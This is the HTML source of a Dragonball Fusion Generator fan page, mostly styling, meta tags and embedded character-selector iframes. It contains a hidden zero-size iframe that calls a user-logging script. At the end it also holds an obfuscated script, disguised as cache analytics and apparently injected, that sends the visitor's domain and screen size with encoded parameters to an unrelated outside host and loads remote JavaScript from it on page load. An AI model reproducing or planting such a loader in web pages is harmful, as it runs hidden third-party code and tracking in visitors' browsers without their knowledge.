


<style>


    .frame 
    {
        border: 2px solid black;
        
        -webkit-border-radius: 20px;
        -o-border-radius: 20px;
        position: relative;
        overflow: hidden;
   }
   
       .frame2
    {
        border: 2px solid black;
        
        -webkit-border-radius: 20px;
        -o-border-radius: 20px;

height: 98px; 
overflow: hidden;

 width:100%; 
        max-width:1000px;
   }
   
   .NTXT
   {
     background: #2A88AD;
    padding: 4px 30px 4px 30px;
    margin: -30px -0px 30px -0px;
    border-radius: 10px 10px 10px 10px;
    -webkit-border-radius: 10px 10px 10px 10px;
    -moz-border-radius: 10px 10px 10px 10px;
    color: #fff;
    text-shadow: 1px 1px 3px rgba(0, 0, 0, 0.12);
    font: normal 30px 'Bitter', serif;
    -moz-box-shadow: inset 0px 2px 2px 0px rgba(255, 255, 255, 0.17);
    -webkit-box-shadow: inset 0px 2px 2px 0px rgba(255, 255, 255, 0.17);
    box-shadow: inset 0px 2px 2px 0px rgba(255, 255, 255, 0.17);
    border: 1px solid #257C9E;

    display: block;
    margin-top: 2px;
    font: 23px Arial, Helvetica, sans-serif;


   }


#inneriframe
{
position:inherit;
top:-152px;

}

#share-buttons img {
width: 35px;
padding: 5px;
border: 0;
box-shadow: 0;
display: inline;
}

  body{

      text-shadow:1px 1px 1px rgba(180,180,180,1);font-weight:bold;color:#000000;letter-spacing:1pt;word-spacing:2pt;font-size:19px;text-align:center;font-family:verdana, sans-serif;line-height:1;
   
  background: url(http://japeal.com/DBFG/dbfgoverlay2.png) top center no-repeat, url(http://japeal.com/DBFG/dbfbackground1.jpg) left top repeat;
    background-size: 103% 630px,auto ;
    

  }
  
  #pkmoverlay {
      overflow: hidden;
position: absolute;
text-align: center;
width: 1280px;
height: 630px;

left: 50%;
margin-top: -10px;
margin-left: -650px;
     z-index: -1000;
}

#font2 {
position: absolute;
}


  
  #demotext {
	  font-family: Helvetica Neue,Helvetica,Arial,sans-serif;
	  font-size: 250%;
background-color: #A40000;
color: #fff;
//text-shadow: 1px 0px 1px #ccc, 0px 1px 1px #444, 2px 1px 1px #ccc, 1px 2px 1px #444, 3px 2px 1px #ccc, 2px 3px 1px #444, 4px 3px 1px #ccc, 3px 4px 1px #444, 5px 4px 1px #ccc, 4px 5px 1px #444, 6px 5px 1px #ccc, 5px 6px 1px #444, 7px 6px 1px #ccc;
}
#demo {
  -webkit-border-radius: 31px;
  border-radius: 31px;
}



	

}
</style>

<html>
<head>
    <link rel="shortcut icon" href="http://japeal.com/DBFG/favicon.ico" type="image/x-icon">
<link rel="icon" href="http://japeal.com/DBFG/favicon.ico" type="image/x-icon">
<title>Dragonball Fusion Generator</title>

<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@DBFGenerator">
<meta name="twitter:title" content="Dragonball Fusion Generatorr">
<meta name="twitter:description" content="DRAGONBALL FUSION GENERATOR see the result!" >
<meta name="twitter:creator" content="@DBFGenerator">
<meta name="twitter:image" content="http://dbfg.japeal.com/upload/0X0X0.png">
<meta name="twitter:domain" content="dbfg.japeal.com">
<meta name="description" content="Dragonball Fusion Generator - Automatically fuse and transform two characters to create a new fighter!" /><link rel="image_src" href="http://dbfg.japeal.com/upload/6X2X0.png" />
  <meta property="og:title" content="Dragon Ball Fusion Generator"/>
  <meta property="og:type" content="website"/>
  <meta property="og:url" id="metaurl" content=http://dbfg.japeal.com/0/0/0/><meta property="og:image"  id="metaimg" content="http://dbfg.japeal.com/upload/491X493X0.png"/>
  <meta property="og:site_name" content="dbfg.japeal.com"/>
  <meta property="og:description" content="Dragonball Fusion Generator - Automatically fuse and transform two characters to create a new fighter!"/> 
  <meta name="apple-mobile-web-app-title" content="Dragonball Fusion Generator">
  <meta property="og:image:width" content="200" />
<meta property="og:image:height" content="200" />


<meta name="viewport" content="width=630">

<meta name="description" content="The long awaited Dragon Ball Fusion Generator - Now you can fuse and transform over 100 characters with over 10,000 fusion combinations!" />
<meta name="keywords" content="dragonball, dragon ball, dragon ball Z, dragonball Z, dragonballz, dragon ball gt, dragonball gt, dragonballgt, dragonball fusion, dragon ball fusion, dragonball fusion generator, dragon ball fusion generator, dbfusion, dbfusion generator, dbfg, dbf, dbf generator, dbz fusion, dragonball super, dbs, dbgt, dragon ball super, dragonballsuper, dragon ball z fusion">
<body style="background-color:powderblue;">


<div id="map" style="display:block; visibility:hidden"> 
  <iframe src="http://pokefusion.japeal.com/flags/loguser.php" height="0px" width=" 0%" ></iframe>
</div><div id="demo"> <p align="center"><iframe name="iframe1" class="frame" scrolling="no" class="frame"  id="inneriframe" src="https://japeal.com/DBFG/DBZSelectorV3.php?ver=3.6&p1=0&p2=0&c=0"  frameborder="0" marginwidth="0" marginheight="0" width="600" height="873"></iframe></p></div>

  
    <div class="NTXT">
    
      
 
<p><cite class="_Rm"><strong>To find out when <span style="text-decoration: underline;">NEW Characters & Transformations</span> get released!</cite></p>
  
 
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31xU4uXIc8h8wRcfzi8jgTSEvo%2bMtYOP%2fLKKNlBOGI8YwUNF%2btYIt%2b9YCXG562dkOlJQSO2Tt3bNKyLuX%2bLU0IWrQyhV17%2f9aIoLl1OafQy7HlSSMsQlg8pgC89W6P6iSDIHyV0iqgfJpLaCFBbr7HWN3Xdls1ZW7hn1qwpUke1Ojhg4IwamR0iOIEbe2iixSldSg0aRQO8sU%2btqW1fVwvwOlCFuA5wJvIxNVTl%2fJlMEIZ8eERHvqFwY6p2pSDrPRT%2fzFN6uEMvaDOI2BPEWNp1P%2bMgKOeJBYFqppmaGrVJPTe5zFKVZ7NM9qdJwE5oLyzH3h2ahEmidqsdTCEzjKe7P%2b10ANbzIRoAkOEB%2bkTWGpjVdCuMd2MKgoUfyEuBuJZYwHu07rx2jTu%2bnMHw%2f6vg82ZHL8wN9G2YuazGe3qU7IJiiv2NXwULa4MVzGL6km8bWgp%2f2065hKzxQFl%2fD9MBYevpys6C9PRBijJB84%2bp93xzptl9aabIjMiiIp6gB%2bhA2QcEHABe7E%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
